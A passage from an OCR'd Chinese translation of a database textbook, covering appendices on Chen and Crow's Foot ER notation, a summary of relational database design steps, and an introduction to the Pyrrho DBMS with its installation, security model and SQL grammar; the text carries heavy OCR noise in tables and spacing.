(k) 产生 一 个 报表 ， 列 出 特定 病人 的 药方 的 情况 (护士 长 )。 

(1) 创建 和 维护 医院 供应 者 情况 的 记录 (医务 主任 )。 

(m) 创建 和 维护 特定 病房 申请 供应 品 的 申请 表 细 节 的 记录 (护士 长 )。 

(n) 产生 一 个 报表 ， 列 出 对 具体 某 个 病房 提供 的 供应 品 的 情况 〈 护 士 长 和 医务 主任 )。 


| 附录 C 


Database Systems: A Practical Approach to Design, Implementation, and Management, 6E 


可 选 的 ER 建 模 表示 法 





| 本 附录 目标 

本 附录 我 们 主要 学 习 : 

@ 如 何 使 用 另 一 些 可 选 的 表示 法 来 创建 ER 模型 

在 第 12 章 和 第 13 章 中 学 习 了 如 何 使 用 越 来 越 流 行 的 表示 法 一 一 UML (统一 建 模 语言 
来 创建 (增强 的 ) 实体 联系 ( ER) 模型 。 在 本 附录 中 ， 将 展示 另外 两 套 常 用 的 ER 表示 法 。 第 
一 套 称 为 Chen ( 陈 氏 ) 表示 法 ， 第 二 套 称 为 Crow Feet ( 鸦 爪 ) 表示 法 。 为 了 给 读者 提供 示范 ， 


下 面 列 出 两 个 表格 ， 展 示 ER 模型 中 每 个 基本 概念 所 对 应 的 表示 法 ， 然 后 再 通过 图 12-1 中 
的 一 部 分 ER 模型 范例 进一步 说 明 它 们 的 使 用 。 


C.1 使 用 Chen 表示 法 的 ER 建 模 


表 C-1 列 出 了 与 ER 模型 中 主要 概念 所 对 应 的 Chen 表示 法 ， 图 C-1 显示 了 将 图 12-1 中 
的 部 分 ER 模型 用 Chen 表示 法 重新 表现 出 来 的 结果 。 


表 C-1 用 于 ER 建 模 的 Chen 表示 法 


表示 法 十 ，”， 六 
实体 名 强 实体 
实体 名 弱 实 体 
联系 名 联系 
联系 名 与 弱 实体 关联 的 联系 


yy 
区 
洪 
六 


角色 色 名 带 角 色 名 的 递归 联系 ， 角 色 名 用 以 标识 实体 在 联系 中 所 扮演 的 角色 
实体 名 
风 必 
主 关键 字 属 性 


属性 名 多 值 属 性 


( 续 ) 























派生 属性 
一 对 一 (1:1) 联系 
一 对 多 (1:M) 联系 


多 对 多 (M :N) 联系 

一 对 多 联系 ， 并 且 A 和 B 实体 都 强制 参与 此 联系 

一 对 多 联系 ，B 实体 强制 参与 此 联系 ，A 实体 可 选 参与 此 联系 
一 对 多 联系 ， 并 且 A 和 B 实体 都 可 选 参与 此 联系 

概 化 /特殊 化 。 如 果 圆 圈 中 含 字符 d (如 图 所 示 )， 则 联系 为 不 相交 ; 


如 果 圆 圈 中 含 字符 0o， 则 联系 不 是 不 相交 的 。 从 超 类 到 圆圈 的 双 线 代 
表 强 制 参与 (如 图 所 示 ); 单线 则 代表 可 选 参与 


图 C-1 将 图 12-1 所 示 ER 模型 中 的 一 部 分 用 Chen 表示 法 表示 


C.2 使 用 Crow Feet 表示 法 的 ER 建 模 


表 C-2 列 出 了 与 ER 模型 中 主要 概念 所 对 应 的 Crow Feet 表示 法 ， 图 C-2 显示 了 将 图 12-1 
中 的 部 分 ER 模型 用 Crow Feet 表示 法 重新 表现 出 来 的 结果 。 
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表 C-2 用 于 ER 建 模 的 Crow Feet 表示 法 


表示 法 含 义 
实体 名 强 实体 
联系 名 联系 
联系 名 
和 名 | | 和 % 带 角色 名 的 递归 联系 ， 角 色 名 用 以 标识 实体 在 联系 中 所 扮演 的 
实体 名 


属性 在 实体 表示 的 下 半 部 分 
主 关键 字 属 性 用 下 划 线 标 出 ， 多 值 属性 放 在 花 括 号 ({}) 中 


一 对 一 联系 

一 对 多 联系 

多 对 多 联系 

一 对 多 联系 , 并 且 A 和 B 实体 都 强制 参与 此 联系 

一 对 多 联系 ，B 实体 强制 参与 此 联系 ，A 实体 可 选 参与 此 联系 


一 对 多 联系 ， 并 且 A 和 了 B 实体 都 可 选 参与 此 联系 


用 “和 矩形 ” 套 “ 和 矩形 ”的 形式 表示 泛 化 / 特殊 化 
















mgrStartDate 


Supervisor 















Manages 
wm | 
ee 


-一 branchNo 


O 
Registers 


图 C-2 将 图 12-1 所 示 ER 模型 中 的 一 部 分 用 Crow Feet 表示 法 表示 
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关系 数据 库 设 计 方法 学 总 结 





| 本 附录 目标 
本 附录 我 们 主要 学 习 : 
e 数据 库 设计 由 三 个 主要 的 阶段 组 成 : 概念 、 逻 辑 和 物理 数据 库 设 计 
e 数据 库 设计 方法 学 各 主要 阶段 中 的 具体 步骤 


本 书 介 绍 了 一 种 关系 数据 库 的 设计 方法 学 。 这 个 方法 由 三 个 主要 的 阶段 组 成 : 概念 、 逻 
辑 和 物理 数据 库 设计 ， 这 些 都 已 经 在 第 16 ~ 19 章 详 细 讨 论 过 。 本 附录 将 为 那些 对 数据 库 设 
计 已 经 非常 熟悉 的 读者 简要 总 结 一 下 这 些 阶段 中 的 各 个 步 又。 


步骤 1 建立 概念 数据 模型 

概念 数据 库 设 计 的 第 一 步 就 是 针对 企业 的 数据 需求 设计 概念 数据 模型 。 概 念 数据 模型 包括 : 
实体 类 型 
联系 类 型 
属性 和 属性 的 域 
主 关键 字 和 候选 关键 字 

e 完整 约束 条 件 

概念 数据 模型 有 支撑 文档 ， 包 括 数据 字典 ， 它 是 在 模型 开发 的 整个 过 程 中 逐步 产生 的 。 
我 们 将 随 着 本 步骤 各 项 任务 的 展开 逐步 细 化 支撑 文档 的 类 型 。 
步骤 1.1 标识 实体 类 型 

建立 局 部 概念 数据 模型 的 第 一 步 是 确定 用 户 感 兴趣 的 主要 对 象 。 标 识 实体 的 一 种 方法 是 
检查 用 户 需 求 说 明 书 ， 从 中 找 出 名 词 和 名 词 短语 。 也 可 以 通过 查找 主要 对 象 ， 比 如 人 、 地 点 
和 关注 的 概念 ， 排 除 那些 仅仅 作为 其 他 对 象 的 限定 词 的 名 词 。 用 文档 记录 实体 类 型 。 
步骤 1.2 标识 联系 类 型 

找 出 在 已 标识 的 实体 类 型 间 存 在 的 重要 联系 。 使 用 实体 联系 图 将 这 些 实体 和 联系 可 视 
化 。 确 定 联系 类 型 的 多 样 性 约束 。 检 查 可 能 存在 的 缺陷 。 用 文档 记录 联系 类 型 。 
步骤 1.3 标识 属性 并 将 属性 与 实体 或 联系 类 型 相关 联 

将 属性 关联 到 合适 的 实体 类 型 或 联系 类 型 上 。 确 定 属性 是 简单 属性 还 是 组 合 属性 ， 是 单 
值 属性 还 是 多 值 属性 ， 是 否 导出 属性 等 。 用 文档 记录 属性 。 
步骤 1.4 ”确定 属性 域 

为 概念 模型 中 的 属性 确定 域 。 用 文档 记录 属性 域 。 
步 又 1.5 确定 候选 关键 字 、 主 关键 字 和 可 替换 关键 字 属 性 

为 每 个 实体 类 型 确定 候选 关键 字 ， 若 候选 关键 字 不 只 一 个 ， 则 选择 其 中 一 个 作为 主 关键 
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字 。 用 文档 记录 每 一 个 强 实体 的 主 关 键 字 和 候选 关键 字 。 
步骤 1.6 ”考虑 使 用 增强 的 建 模 概 念 〈 可 选 步骤 ) 
考虑 使 用 增强 的 建 模 概念 ， 比 如 特殊 化 / 泛 化 、 聚 合 和 组 合 。 
步骤 1.7 检查 模型 的 元 余 
检查 模型 中 可 能 出 现 的 任何 元 余 。 尤 其 是 重新 检查 一 对 一 联系 ， 去 除 宛 余 联系 并 考虑 时 
间 维 度 。 
步骤 1.8 针对 用 户 事务 验证 概念 数据 模型 
确保 概念 数据 模型 支持 所 要 求 的 事务 。 有 两 种 可 选 的 方法 : 叙述 事务 或 使 用 事务 路 径 
走 查 。 
步骤 1.9 与 用 户 一 起 复查 概念 数据 模型 
与 用 户 一 起 复查 概念 数据 模型 以 确保 模型 真实 反映 了 企业 的 需求 。 


步骤 2 建立 逻辑 数据 模型 

根据 概念 数据 模型 构建 逻辑 数据 模型 ， 然 后 验证 该 模型 以 确保 其 结构 正确 (使 用 规范 化 
技术 )， 并 能 支持 所 要 求 的 事务 。 
步骤 2.1 从 逻辑 数据 模型 中 导出 关系 

根据 表示 已 标识 实体 、 联 系 和 属性 的 概念 数据 模型 创建 关系 。 表 D-1 总 结 了 如 何 将 实 
体 、 联 系 和 属性 映射 到 关系 中 。 用 文档 记录 关系 和 外 部 关键 字 属 性 ， 同 时 记录 那些 从 逻辑 数 
据 模 型 导出 关系 的 过 程 中 新 形成 的 主 关键 字 或 可 替换 关键 字 。 


表 D-1 如 何 将 实体 和 联系 映射 为 关系 


实体 /联系 /属性 映射 为 关系 
强 实体 生成 包含 所 有 属性 的 关系 
i 生成 包含 所 有 简单 属性 的 关系 ( 当 与 每 个 属 主 实体 的 联系 被 映射 之 后 ， 再 标识 
出 主 关键 字 ) 
RE 一 方 实体 的 主 关键 字 作 为 表示 多 方 实体 的 关系 的 外 部 关键 字 ， 该 联系 若 有 任 
二 元 联系 何 属性 也 安排 在 多 方 
一 对 一 二 元 联系 
(a) 两 方 都 强制 参与 两 个 实体 组 合 为 一 个 关系 
(b) 一 方 强制 参与 可 选 方 实体 的 主 关键 字 安排 为 表示 强制 方 实体 的 关系 的 外 部 关键 字 
(e) 两 方 都 可 选 参与 若 没有 进一步 的 信息 则 可 随意 
超 类 / 子 类 联系 参见 表 D-2 
i 生成 一 个 表示 该 联系 的 关系 ， 该 关系 包含 该 联系 的 所 有 属性 作为 该 关系 外 部 
多 对 多 一 元 联系 ， 复 杂 联系 | 关键 字 出 现 的 所 有 属 主 实体 的 主 关键 字 
生成 一 个 表示 该 属性 的 关系 ， 并 把 该 属性 的 属 主 实体 的 主 关键 字 作 为 该 关系 
的 外 部 关键 子 


表 D-2 基于 参与 和 不 相交 约束 的 超 类 / 子 类 联系 的 表示 


参与 约束 不 相交 约束 映射 为 关系 


强制 非 不 相交 {And} 单个 关系 (用 一 个 或 多 个 判别 式 区 分 每 个 元 组 的 类 型 ) 






不 相交 约束 


非 不 相交 {And} 


不 相交 {Or} 
不 相交 {Or} 


步 又 2.2 使 用 规范 化 方法 验证 关系 

使 用 规范 化 方法 验证 逻辑 数据 模型 中 的 关系 。 这 个 步骤 的 目标 是 确保 从 逻辑 数据 模型 中 
导出 的 每 个 关系 至 少 是 第 三 范式 (3NF)。 
步 又 2.3 针对 用 户 事务 验证 关系 

保证 逻辑 数据 模型 中 的 关系 支持 所 要 求 的 事务 
步骤 2.4 检查 完整 约束 条 件 

确定 完整 性 约束 条 件 ， 包 括 指定 有 效 数据 约束 、 属 性 域 约束 、 多 样 性 、 实 体 完整 性 、 引 
用 完整 性 、 一 般 性 约束 。 用 文档 记录 所 有 的 完整 性 约束 。 
步 又 2.5 与 用 户 一 起 复查 逻辑 数据 模型 

保证 用 户 肯定 该 逻辑 数据 模型 真实 反映 了 企业 的 数据 需求 。 
步 又 2.6 “将 逻辑 数据 模型 合并 为 全 局 模型 

方法 学 中 步骤 2 的 指南 适用 于 从 简单 到 复杂 数据 库 的 设计 。 例 如 ， 无 论 设计 单 用 户 或 多 
用 户 视图 的 数据 库 ， 若 采用 集中 法 (参见 10.5 节 )， 则 步骤 2.6 可 省 去 。 然 而 ， 当 数据 库 有 
多 个 视图 ， 系 统 选择 采用 视图 集成 法 (参见 10.5 节 ) 设计 时 ， 那 么 对 代表 数据 库 不 同 视图 的 
每 个 模型 都 要 重复 步骤 2.1 至 步骤 2.5， 在 步骤 2.6 合并 这 些 数据 模型 。 合 并 过 程 中 通常 的 任 
务 包括 : 

(1 ) 检查 实体 /关系 的 名 字 与 内 容 以 及 它们 的 候选 关键 字 。 

(2 ) 检查 联系 / 外 部 关键 字 的 名 字 与 内 容 。 

(3 ) 合并 来 自 局 部 数据 模型 中 的 实体 / 关系 。 

(4 ) 纳入 (不 是 合并 ) 那些 仅 出 现在 某 个 局 部 数据 模型 的 实体 / 关系 。 

(5 ) 合并 来 自 局 部 数据 模型 中 的 联系 / 外 部 关键 字 。 

(6 ) 纳入 (不 是 合并 ) 那些 仅 出 现在 某 个 局 部 数据 模型 的 联系 / 外 部 关键 字 。 

(7 ) 检查 是 否 有 遗漏 的 实体 / 关系 和 联系 / 外 部 关键 字 。 

(8 ) 检查 外 部 关键 字 。 

(9 ) 检查 完整 性 约束 。 

(10 ) 绘制 全 局 ER/ 关系 图 。 

(11 ) 更 新 文档 。 如 果 必 要 的 话 ， 使 用 规范 化 技术 来 验证 由 全 局 逻辑 数据 模型 创建 的 关 

系 ， 保 证 它们 支持 所 需 的 事务 。 

步骤 2.7 “检查 模型 对 未 来 可 扩展 性 的 支持 

判断 在 可 预见 的 将 来 是 否 会 出 现 一 些 重大 变化 ， 并 评估 全 局 逻辑 数据 模型 是 否 能 适应 这 
些 变化 。 






两 个 关系 : 一 个 表示 超 类 ， 另 一 个 表示 所 有 子 类 (用 一 个 或 多 个 判别 式 
区 分 每 个 元 组 的 类 型 ) 


多 个 关系 : 每 一 对 超 类 / 子 类 转化 为 一 个 关系 
多 个 关系 : 一 个 关系 表示 超 类 ， 其 他 每 个 子 类 对 应 一 个 关系 
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步骤 3 转换 逻辑 数据 模型 以 适应 目标 DBMS 

由 逻辑 数据 模型 产生 一 个 可 在 目标 DBMS 中 实现 的 关系 数据 库 模 式 。 
步骤 3.1 设计 基础 关系 

确定 在 目标 DBMS 中 如 何 表示 全 局 逻辑 数据 模型 中 的 各 个 基本 关系 。 用 文档 记录 这 些 
基本 关系 的 设计 。 
步骤 3.2 设计 导出 数据 的 表示 方法 

确定 在 目标 DBMS 中 如 何 表示 全 局 逻辑 数据 模型 中 存在 的 导出 数据 。 用 文档 记录 这 些 
导出 数据 的 设计 。 


步骤 3.3 ”设计 一 般 性 约束 
针对 目标 DBMS 设计 一 般 性 约束 。 用 文档 记录 一 般 性 约束 的 设计 。 
步骤 4 设计 文件 组 织 方法 和 索引 
选择 可 选 的 文件 组 织 方法 ， 用 以 存储 基本 关系 和 索引 以 使 其 达到 可 接受 的 性 能 ， 也 就 是 
确定 关系 和 元 组 在 辅 存储 器 上 存储 的 方式 。 
步骤 4.1 分 析 事 务 
理解 那些 将 要 在 数据 库 上 运行 的 事务 并 分 析 重 要 的 事务 。 
步骤 4.2 ”选择 文件 组 织 方法 
为 每 个 基本 关系 确定 有 效 的 文件 组 织 方法 。 
步骤 4.3 ”选择 索引 
确定 增加 的 索引 是 否 改善 了 系统 的 性 能 。 
步骤 4.4 估计 所 需 的 磁盘 空间 
估计 数据 库 所 需要 的 磁盘 空间 量 。 


步骤 5 设计 用 户 视 图 
设计 那些 早 在 关系 数据 库 系统 开发 生命 周期 的 需求 收集 和 分 析 阶 段 就 已 经 确定 的 用 户 视 
图 。 用 文档 记录 这 些 用 户 视图 的 设计 。 
步骤 6 设计 安全 机 制 
根据 用 户 要 求 设计 数据 库 的 安全 措施 。 用 文档 记录 这 些 安全 措施 的 设计 。 
步骤 7 考虑 引入 可 控 元 余 


确定 是 否 需要 以 可 控 的 方式 引入 元 余 ， 缓 解 规范 化 限制 以 提高 系统 的 性 能 。 例 如 ， 考 虑 
复制 属性 或 将 关系 连接 起 来 ， 等 等 。 用 文档 记录 引入 的 元 余 。 


步骤 8 监控 系统 和 系统 调 优 
监控 实际 运行 系统 ， 为 了 纠正 不 合理 的 设计 决策 或 适应 变更 的 需求 ， 调 优 系 统 性 能 。 
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轻 量 级 RDBMS: Pyrrho 简介 





由 Malcolm Crowe 拟稿 ，www.pyrrhodb.com 





本 附录 我 们 主要 学 习 : 

e@ Pyrrho DBMS 的 主要 概念 和 体系 结构 

e@ Pyrrho 与 SQL:2011 标准 的 兼容 性 

e@ 用 户 和 开发 人 员 如 何 使 用 Pyrrho DBMS 


Pyrrho 是 一 个 小 规模 的 开源 关系 数据 库 (小 于 1MB)， 特 别 适 合 移动 和 艇 人 式 应 用 。 它 
在 所 提供 的 特性 上 与 SQL:2011 标准 严格 兼容 。Pyrrho 能 运行 在 Windows 的 .NET 平台 和 
Linux 上 ， 除 了 通常 的 .NET 类 (IDbCommand、DataReader 和 DataAdapter 等 ) 外 ， 它 还 能 
与 PHP 和 SWIProlog 接口 。 开 源 Pyrrho 也 实现 了 Java 持久 API。 对 于 这 些 特 性 ，Pyrrho 做 
了 两 点 扩充 : 一 是 增加 了 遵循 OWL2 的 语义 数据 和 行 类 型 ; 二 是 支持 基于 角色 的 安全 和 数 
据 建 模 ， 即 数据 库 对 象 的 命名 和 操作 许可 均 依 赖 于 用 户 当 前 的 角色 。 

Pyrrho 采用 严格 的 ACID 事务 模型 : Pyrrho 事务 完全 隔离 (无 污 读 ) 且 强 势 持 久 ， 即 数 
据 库 历史 完全 保留 且 不 能 更 改 ， 除 非 破 坏 数 据 库 本 身 。 原 子 性 和 一 致 性 如 此 来 强制 : 用 单一 
操作 将 事务 的 所 有 数据 写 到 非 易 失 存储 器 ， 这 意味 着 Pyrrho 写 和 人 非 易 失 存储 器 的 次 数 约 为 
其 他 DBMS 的 1/70。 因 此 ， 若 服务 器 有 足够 的 内 存 ，Pyrrho 将 更 快 ， 更 适合 远程 存储 ( 例 
如 移动 装置 )。 

关于 用 户 身 份 标识 和 操作 许可 ，Pyrrho 也 采取 严格 的 观点 ，Pyrrho 应 该 用 于 那些 数据 
稳定 聚集 并 要 永久 保持 的 应 用 场景 。 例 如 ， 客 户 数据 、 订 单 记 录 和 付款 记录 等 。 而 一 些 过 
程 性 数据 ， 如 分 析 、 预 测 等 数据 也 能 用 Pyrrho 处 理 ， 但 应 放 在 另外 的 数据 库 ， 与 永久 数据 
分 离开 来 。 这 样 一 来 ， 这 些 过 程 性 数据 产生 的 结果 一 旦 用 完 ， 过 程 性 数据 就 可 以 整体 删 掉 。 
Pyrrho 对 多 数据 库 连 接 的 支持 也 使 得 这 样 做 成 为 可 能 。 

本 附录 总 结 了 Pyrrho 的 基本 特性 。Pyrrho 的 各 个 版 本 (1 一 6MB ) 都 可 从 Pyrrho Web 网 
站 www.pyrrhodb.com 上 免费 下 载 ， 网 站 上 还 有 访问 Pyrrho SQL 语法 和 其 他 特性 的 细节 信息 
的 链接 。 


E.1 Pyrrho 特性 


Pyrrho 包括 下 列 主 要 的 SQL:2011 特性 : SQL 例 程 语言 间隔 (intervals) 和 日 期 时 间 
(datetime) 型 数据 计算 ; 含 子 查询 的 域 和 约束 ; 计算 完备 性 ; 导出 表 ; 行 和 表 构 造 器 ; 结 
构 类 型 ; 数组; 多 重 集 ; 角色 ; 高 级 OLAP 功能 ; 时 序 版 本 化 表 和 XML。 完整 特性 列表 见 
Web 网 站 。 

Pyrrho 在 以 下 方面 与 SQL:2011 标准 不 同 : 认为 小 整 型 (smallint) 和 双 精 度 是 多 余 的 ， 因 
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而 不 予 支 持 ( 应 分 别 用 整 型 int 和 实 型 real 代替 ) ; 无 限制 变 长 串 (unbounded varying strings) 
被 视 为 默认 类 型 ; 在 SQL 中 可 用 HTTP 操作 ; REVOKE 比 在 SQL:2011 中 更 直观 (无 条 件 收 
回 权 限 ); ISOLATED (隔离 ) 是 唯一 能 进行 的 事务 设置 支持 时 序 表 ; ALTER SCHEMA 基 
于 角色 并 包括 某 些 元 数据 和 级 联 的 重 命名 ; 不 支持 CREATE SCHEMA 和 老式 的 嵌入 式 SQL 
结构 。 此 外 : 

e Pyrrho 支持 完整 Unicode 字符 集 ， 并且 数据 库 是 场地 独立 的 。 

e 开源 版 本 支持 Java 永久 库 。 

e 所 有 版 本 都 支持 PHP、SWI-Prolog 和 LINQ。 


E.2 下 载 并 安装 Pyrrho 


在 Windows 下 首先 要 安装 .NET 平台， 从 Microsoft Update 可 获得 。 在 Linux 下 ,Mono 
project (www.monoproject.com) 提供 所 要 求 的 下 载 。 

从 www.pyrrhodb.com 下 载 Pyrrho 专业 版 并 在 合适 的 目录 位 置 抽取 出 文件 。 一 种 好 的 习 
惯 是 把 服务 器 PyrrhoSvr.exe 移动 到 另 一 目录 位 置 ， 包 含 PyrrhoSvr.exe 的 文件 夹 也 将 包含 数 
据 库 文件 ， 因 此 ， 该 文件 夹 的 所 有 者 应 从 命令 行 启动 PyrrhoSvrexe。 在 Linux 下 ， 该 命令 为 
mono PyrrhoSvr.exe。 

为 预防 起 见 ，Windows 可 能 会 提示 中 止 了 该 程序 ， 如 果 你 想 继续 在 网 络 上 用 该 服务 
器 ， 则 按 一 下 该 安全 对 话 框 中 的 “不 中 止 ” 按 钮 。 关 于 防火 墙 配置 细节 ， 见 Web 网 站 www. 
pyrrhodb.com。 

默认 情况 下 ，PyrrhoSvr 在 端口 5433 提供 数据 库 服务 ， 在 端口 8080 提供 Web 服务 。 可 
用 你 的 Web 浏览 器 http://localhost:8080/ 检查 一 下 该 服务 器 是 否 正在 运行 。 

导出 的 Web 页 可 用 于 试用 简单 的 SQL 语句 。 

下 载 中 有 两 个 标准 实用 程序 ， 一 个 是 PyrrhoCmd， 它 是 带 控制 台 界 面 的 命令 行 处 理 器 ; 
男 一 个 是 PyrrhoSQL， 它 用 的 是 Windows 用 户 界面 。 客 户 端 若 要 连接 一 个 Pyrrho 或 开源 
Pyrrho 数据 库 ， 必 须要 有 客户 端 库 PyrrhoLink.dll (或 OSPLink.dll)。 最 简单 的 做 法 就 是 将 
一 个 PyrrhoLink.dll/OPSLink.dll 的 副本 放 在 与 可 执行 工具 相同 的 位 置 上 ( 像 Visual Studio 这 
类 工具 会 自动 完成 )。 

对 于 艇 入 式 应 用 ， 这 个 动态 链接 库 (.dll) 常 与 EmbeddedPyrrho.dll、OSP.dll、Android- 
OSP.dl1、PhoneOSP.dll 或 SilverlightOSP.dll 中 的 某 个 连用 。 


E.3 开始 使 用 


为 了 从 命令 行 开 始 使 用 数据 库 ， 键 人 : 

PyrrhoCmd 

默认 的 数据 库 名 为 Temp， 若 要 用 一 个 别 的 数据 库 ， 则 可 在 该 命令 行 后 面 指出 来 。 上 面 
的 命令 行 第 一 次 运行 时 ，PyrrhoSvr 会 创建 一 个 称 为 Temp 的 数据 库 ， 新 数据 库 的 所 有 者 就 是 
发 出 这 条 PyrrhoCmd 命令 的 用 户 。 计 算 机 显示 光标 SQL> 作为 回应 。 系 统 表 Sys$Database 
和 Sys$Table 可 用 于 检查 哪些 表 可 访问 : 


SQL> TABLE “Sys$Database” 
注意 ，SQL:2003 要 求 用 双 引 号 ， 把 那些 匹配 保留 字 、 大 小 写 敏 感 或 包含 $ 这 样 的 特殊 
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字符 的 标识 符 括 起 来 。 
用 这 样 的 语句 创建 表 : 
CREATE TABLE Members (id int primary key, surname char) 


这 将 创建 一 个 名 为 MEMBERS 的 表 。 注 意 Pyrrho 默认 域 的 大 小 ， 因 此 这 里 的 SURNAME 
实际 是 个 串 。 为 了 在 MEMBERS 中 加 入 行 ， 可 用 语句 : 
INSERT INTO Members (surname) values (Bloggs’), (Smith ) 


默认 时 ，Pyrrho 会 为 整形 int 的 主 关 键 字 提 供 合适 的 值 ， 比 如 这 里 的 ID， 当然 你 也 可 以 
自己 提供 值 。 

用 这 样 的 命令 行 界面 输入 SQL 语句 时 ， 要 避免 在 语句 结束 前 使 用 回 车 键 。 一 种 可 选 的 
办 法 是 ， 语 句 前 缀 上 [ 并 以 ] 结束 ， 此 时 在 语句 中 间 即 可 用 回 车 键 了 。 


E.4 连接 串 


应 用 开发 人 员 可 用 .NET API 进行 数据 库 系统 开发 。 为 了 用 PyrrhoLink.dll 连接 数据 库 ， 
要 先 定 义 PyrrhoConnect 的 一 个 实例 。 用 C# 写 的 代码 为 : 


var conn = new PyrrhoConnect(connectionString); 
conn.Open(); 


为 连接 名 为 Temp.pfl 的 单个 数据 库 ， 连 接 串 可 简单 为 “Files 王 Temp”。 

连接 一 旦 打开 ， 标 准 的 .NET 机制 便 开始 作用 。 首 先 ， 使 用 CreateCommand 方法 创建 
一 个 IDbCommand， 利用 CommandText 属性 即 可 将 一 个 SQL 语句 赋 给 它 。 然 后 ， 该 命令 
调用 ExecuteNonQuery， 将 SQL 语句 送 到 服务 器 执行 ， 接 着 调用 ExecuteReader 给 出 一 个 
DataReader， 用 于 读 取 和 访问 所 选 数据 。 

使 用 Visual Studio 的 开发 者 还 能 增加 来 自 PyrrhoLink.dll 的 一 些 工 具 箱 条 目 ， 包 括 内 含 
连接 串 设 计 器 的 数据 适配器 等 。 


E.5 Pyrrho 的 安全 模型 


最 早 使 用 客户 端 实用 程序 的 某 个 人 应 该 创建 数据 库 的 基本 表 ， 并 把 对 这 些 表 的 操作 许可 
授予 其 他 用 户 。 对 于 每 个 事务 ，Pyrrho 都 记录 下 用 户 和 他 在 此 事务 中 的 角色 。 每 个 数据 库 都 
有 一 个 与 数据 库 同名 的 缺 省 角色 ， 数 据 库 最 初 的 创建 者 可 以 使 用 该 角色 名 。 一 个 用 户 可 能 被 
授予 几 种 角色 权限 ， 但 一 次 只 能 用 一 种 ， 或 在 连接 串 中 选 定 ， 或 用 SET ROLE 命令 交互 式 
设置 ， 例 如 ， 


set role“Sales” 


其 他 用 户 必 须 在 授予 某 种 具体 权限 〈 使 其 在 数据 库 中 具有 合法 身份 ) 后 才能 对 数据 库 进 
行 任何 修改 。 

共享 数据 库 最 简单 (也 是 最 坏 ) 的 方式 就 是 允许 所 有 具有 这 样 的 角色 名 的 用 户 做 任何 事 ， 
而 匿名 用 户 只 人 允许 读 操作 。 因 此 ， 在 Windows 下 ， 如 果 数 据 库 MyDb 上 没有 其 他 安全 设置 ， 
那么 该 数据 库 的 创建 者 就 能 利用 下 面 的 授权 语句 与 计算 机 (或 域 ) JOE 上 的 用 户 “mary” 共 
享 该 数据 库 : 

GRANT ROLE “MyDb” to “JOEmary” 
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这 将 允许 “ mary” 以 任何 方式 访问 或 修改 该 数据 库 ， 除 了 不 能 改 安全 设置 。 双 引号 是 
必需 的 ， 因 为 数据 库 名 和 用 户 名 都 是 大 小 写 敏感 的 。 而 语句 
GRANT ROLE “MyDb” to public 


则 使 得 任何 用 户 都 能 访问 和 修改 数据 库 MyDb， 但 不 能 改 安全 设置 。 其 他 形式 的 授权 语 
句 可 用 于 说 明 对 特定 的 数据 库 对 象 可 使 用 哪些 特殊 权利 。 授 权 可 用 REVOKE 语句 撤销 。 当 
用 户 被 授予 操作 许可 后 ， 他 们 当然 就 能 访问 由 这 些许 可 确定 的 当前 可 访问 的 数据 。 也 有 一 些 
特例 : 比如 数据 库 的 所 有 者 能 访问 所 有 日 志 ， 系 统 表 是 对 所 有 用 户 公开 但 是 只 读 的 。 

注意 ，Pyrrho 的 用 户 ID 就 是 用 户 名 (在 Windows 下 形式 为 “DOMAIN\user”)， 而 不 
是 操作 系统 使 用 的 UID 或 SID。 


E.6 Pyrrho SQL 语法 


Pyrrho 中 的 串 用 单 引号 括 起 来 。 串 中 连续 的 两 个 单 引 号 则 表示 一 个 单 引 号 。Hexits 是 
十 六 进 制 数字 0-9，A-F 和 a-f， 它 们 用 于 表示 二 进 制 对 象 。 日 期 、 时 间 和 间隔 都 用 (引起 来 ) 
串 值 ， 并 且 不 是 场地 依赖 的 。 更 多 细节 见 SQL:2003。 例 如 ， 
日 期 数据 形式 如 DATE“yyyy-mm-dd " 。 
时 间 数 据 形式 如 TIME“hh:mm:ss” 或 TIME ‘hh:mm:ss.sss”。 
时 间 戳 形式 如 TIMESTAMP“yyyy-mm-dd hh:mm:ss.ss” 。 
间隔 的 形式 包括 : 
m INTERVAL ‘yyy’ YEAR 
四 INTERVAL ‘yy-mm’ YEAR TO MONTH 
m INTERVAL ‘m’” MONTH 
m INTERVAL ‘d hh:mm:ss” DAY(1) TO SECOND 
INTERVAL “sss.ss”SECOND(3, 2) 等 
下 面 列 出 Pyrrho 支持 的 SQL 文法 大 纲 ， 更 多 细节 可 下 载 文档 Pyrrho.doc，, 或 在 Web 网 
站 上 查看 。 


Sql = SqlStatement [;] . 


SqlStatement = Alter 
BEGIN TRANSACTION [WITH PROVENANCE string ] 
| Call 
| COMMIT 
| CreateClause 
| CursorSpecification 
| DeleteSearched 
| DropClause 
| Grant 
| Insert 
| Rename 
| Revoke 
| ROLLBACK 
| SET AUTHORIZATION ‘=’ CURATED 
| SET PROFILING ‘=’ (ON |OFF) 
| SET ROLE id 
| SET TIMEOUT = int 
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Statement = 
| 
| 
| 
| 
| 
| 
| 
| 
| 
| 
| 
| 
| 
| 
| 
| 
| 
| 
| 
| 
| 
| 
| 
| 


HttpRest = 
| 
Alter = 
| 


Method = 


UpdateSearched 
HTTP HttpRest . 


Assignment 

Call 
CaseStatement 
Close 
CompoundStatement 
BREAK 
Declaration 
DeletePositioned 
DeleteSearched 
Fetch 
ForStatement 
IfStatement 
Insert 

ITERATE label 
LEAVE label 
LoopStatement 
Open 

Repeat 

RETURN Value 
SelectSingle 
SIGNAL Condition_id 
UpdatePositioned 
UpdateSearched 
While 

HTTP HttpRest. 


(ADD|UPDATE) ur!l_Value data_Value [AS mime_string] 
DELETE wurl_Value. 


ALTER DOMAIN id AlterDomain { ',’ AlterDomain } 
ALTER FUNCTION id ( Parameters ') RETURNS Type 
AlterBody 

ALTER PROCEDURE id ( Parameters ) AlterBody 
ALIER Method AlterBody 

ALIER TABLE id AlterTable{ ‘,’ AlterTable } 

ALIER TYPE id AlterType { ，AlterIType } 

ALTER VIEW id AlterView { '," AlterView }. 


MethodTypeMETHODid'( Parameters ) [RETURNSType] 
[FOR id]. 


Parameters = Parameter {', Parameter } . 


Parameter = id Type . 


MethodType = 


AlterDomain = 


AlterBody = 


AlterOp = 
| 


[OVERRIDING | INSTANCE | STATIC | CONSTRUCTOR]. 


SET DEFAULT Default 
DROP DEFAULT 
TYPE Type 

AlterCheck . 


AlterOp { ，AlterOp } . 


TO id 
Statement 
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| [ADD|DROP] Metadata . 


Default = Literal | DateTimeFunction | CURRENT USER | 
CURRENT ROLE | NULL | ARRAY (7 | MULTISET( ). 
AlterCheck = ADD CheckConstraint 


| [ADD|DROP] Metadata 
| DROP CONSTRAINT id . 


CheckConstraint = [CONSTRAINT id] CHECK ‘([XMLOption] 
